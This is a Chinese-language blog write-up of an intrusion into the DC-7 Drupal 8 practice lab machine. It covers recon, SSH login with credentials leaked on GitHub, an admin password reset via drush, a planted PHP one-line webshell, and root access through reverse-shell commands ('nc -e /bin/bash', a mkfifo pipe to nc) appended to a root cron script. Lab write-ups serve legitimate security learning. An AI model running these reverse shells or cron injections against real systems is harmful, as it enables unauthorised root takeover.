DC-7(两次反弹)

最新推荐文章于 2024-09-14 17:41:03 发布
最新推荐文章于 2024-09-14 17:41:03 发布
阅读量101 收藏
点赞数
分类专栏: 打靶机 文章标签: php linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JyajT/article/details/130323512
版权

信息搜集

  1. 通过nmap扫描ip和端口发现:ip为192.168.6.151,开放端口号为80和22
  2. 针对端口号进行单独扫描没有太多有用信息
  3. 查看框架:在浏览器输入靶机ip,利用插件查看为Drupal 8(可以用网站指纹工具查whatweb+ip)
  4. 查看目录:dirsearch -u http://192.168.6.151

 根据上图发现了用户登录界面,按照常理接下来应该是进行用户名和密码的爆破

 所以进行漏洞扫描:searchsploit Drupal 8;但是没有可以利用的CVE漏洞

 这时想起网站首页的话内容大概是要跳脱出平常的思维,然后看见网站底部有一个像用户名的东西,去搜索了一下发现在GitHub上面有这个网站的相关信息

 其中config文件中还有一个用户名和密码,dc7user,MdR3xOgB7#dW

漏洞利用

这个用户名和密码可以在网站上先试试,不过很显然不能登录成功,这时想到了最开始的22端口可以试试远程登录,ssh dc7user@192.168.6.151

发现两个文件夹,分别进入查看

cat mbox,发现了一个sh文件,里面的cron是定时任务的意思

进入该文件目录,内容中有一些命令没见过,这个文件有!/bin/sh说明很有可以在提权的时候会用到

其中的drush是drupal框架中用来做一些配置的命令,它可以改变用户名密码

再看看backups文件夹发现全是gpg结尾的文件,通过搜索发现这是一种加密方式

就目前的信息来看只有drush是有用的我们可以修改一个已知用户(admin)的密码然后登陆进去:drush user-password admin --password="123456"

登陆成功

反弹shell

现在就是找一个空白页可以上传php代码的那种然后利用蚁剑反弹shell(利用Drupal反弹shell)

content-add content-basic page;,然后保存,得到如图结果,查资料得知该页面不支持php代码,需要自己重新安装模块

安装模块:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz,这里选择下载安装包手动安装

 接下来安装

 选择PHP Fliter安装

 设置一句话木马

 用工具进行连接,这里不知道有什么问题连不上所以,不再利用蚁剑反弹到kali,而是直接利用页面反弹shell:;交互python -c 'import pty;pty.spawn("/bin/bash")'

 这里会再次反弹,前文提到过的那个backups.sh文件派上了用场

rm /tmp/f 删除该文件(以免跟后面定义的 管道符 冲突)

mkfifo /tmp/f 这是创建自定义有名管道符。管道符的名称是 /tmp/f (用于进程间的通讯, 如 ls > /tmp/f ,cat /tmp/f ,连通两个进程之间的通讯)

cat /tmp/f 取出管道符中的内容,|/bin/sh -i 2>&1 将前面取出的内容作为输入,输入给 /bin/sh,再将bash的标准错误输出 也作为标准输入 (2 >&1)给bash 然后再将bash的输出,传给nc 远程,再将nc 传来的数据,写入 管道符 /tmp/f 。最后首尾接通了。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.6.128 1234 >/tmp/f" >> /opt/scripts/backups.sh

  • 方法二:利用定时任务

echo "nc -e /bin/bash 192.168.6.128 1234" >> /opt/scripts/backups.sh

 按理来说这里监听成功就可以了至于出来什么问题还不知道(原因是backup.sh没有使用绝对路径),反弹回来就是root的权限

总结

  1. 这里用了两次反弹shell,一次从网站到kali,另一次是从kali到kali
  2. 开始在蚁剑无法连接上卡了很久,实在是没整出来,所以选择直接利用php的system来反弹第一个shell
  3. 在第二反弹shell的时候利用了命名管道mkfio,但是无法成功返回,发现有的博主是直接蚁剑的backups.sh文件中利用nc反弹(当然前提是第一次用工具反弹成功了)
  4. 总之还是要根据框架(drupal8)去寻找突破口
  5. 关于drush命令和mkfifo(https://www.cnblogs.com/old-path-white-cloud/p/11685558.html)的使用
  6. 这里也使用了重定向来写入数据
  7. 遗留的问题为什么最后一步反弹回来就是root权限(刚刚又看了以下.sh文件中有root@dc-7的定时任务也就是也有cron命令这是不是就意味着这个文件所属权在root?),如何得知需要反弹两次shell
  8. 最后没有反弹成功的原因是backup.sh没有使用绝对路径
JyajT
关注
专栏目录
DC-DC PCB layout 指导.docx
06-18
7. DC-DC Ton 和 Toff 时的电流路径都应该很短,减少阻抗和寄生电感。 8. 小信号是单点接地,距离比较远,免受大电流开关噪声的影响。 9. 在设计 DC-DC PCB 布局时,需要确保所有反馈连接短而直接,反馈电阻和补偿...
DC-7靶机反弹php shell
SingWeek
08-28 261
在对靶机DC-7进行渗透测试学习时,发现无法使用介绍的方法echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.135 1234 >/tmp/f" >> backups.sh进行反弹shell提权。 前面的步骤与网上介绍的方法一样,这里不做过多阐述。后台账号密码:dc7user/MdR3xOgB7#dW ssh dc7user@192.168.23.142远程...
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
dc-sdk-examples:DC-SDK开发示例
05-11
"DC-SDK开发示例"是一个专门为开发者设计的项目,旨在帮助他们更好地理解和使用DC-SDK进行3D可视化开发。DC-SDK(可能是"Data Center SDK"或类似的缩写)是一个强大的工具集,用于构建基于Web的三维场景,特别是在...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
一码空传临时网盘PHP源码,支持提取码功能
爱酷码的博客
09-11 346
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 542
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 800
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 741
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1875
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 604
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
php+mysql日志审计管理系统
python0328的博客
09-10 478
本系统实现了:用户登陆、日志审计、监控规则、用户管理。
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 628
访问一下 最后getshell
thinkphp6 事务不起作用了咋回事
f897907070的博客
09-11 335
在用到事务的时候 用的tp6事务 写完代码,抛出异常的时候,数据库的数据,依然在变化,在执行,就很纳闷,事务不是抛出异常,就不会执行吗,难道自己写错了,反复看了好几遍代码,感觉也没有用处,但是代码就是在执行了。但是选了时候,保存的时候,还是报错,此时需要注意下 行格式也要改 ,选成Dynamic。于是静下心来想了下,原来是数据库的存储引擎选错了,用了myisam 而是要用InnoDB。如图 保存成功之后,事务正常使用了,遇到异常,也就正常回滚了。
PHP随时随地预订民宿酒店预订系统小程序源码
2401_84413903的博客
09-12 465
在这个快节奏的时代里,“随时随地预订民宿酒店预订系统”无疑成为了我们旅行中的得力助手。它不仅让我们摆脱了繁琐的预订流程和时间限制,更让我们能够随心所欲地规划自己的旅行路线和住宿体验。无论你是想要一场说走就走的旅行,还是想要精心策划一次难忘的假期,都不妨试试这个预订系统吧!相信它一定会让你的旅行变得更加自由、便捷和美好!
win权限提升总结
2301_80064376的博客
09-10 1923
在现代计算环境中,Windows权限提升是关键的安全话题。它涉及利用系统漏洞或配置错误,从而实现从普通用户权限到更高级别权限的转变。这一过程对于安全研究人员和网络攻击者都具有重要意义,前者致力于发现并修补这些漏洞以增强系统安全,后者则可能利用这些漏洞进行恶意操作。因此,深入了解Windows权限提升的机制及其防御措施,对于维护网络安全环境是至关重要的。
php 实现JWT
Crazy_shark的博客
09-11 579
PHP 中,JSON Web Token (JWT) 是一种开放标准 (RFC 7519) 用于在各方之间作为 JSON 对象安全地传输信息。JWT 通常用于身份验证系统,如 OAuth2 或基于令牌的身份验证。以下是一个基本的 PHP 实现 JWT 生成和验证的代码示例。
laravel 查询数据对象转数组
ddliyoutang的博客
09-12 243
【代码】laravel 查询数据对象转数组。
理解与减轻DC-DC转换器中的接地反弹现象
"减小DC-DC变换器中的接地反弹:一些接地要点" 在电子设计中,DC-DC变换器的接地反弹是一个重要的考虑因素,它直接影响系统的稳定性、效率和电磁兼容性(EMC)。接地反弹,也称为地弹,是指在高速开关操作中,由于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值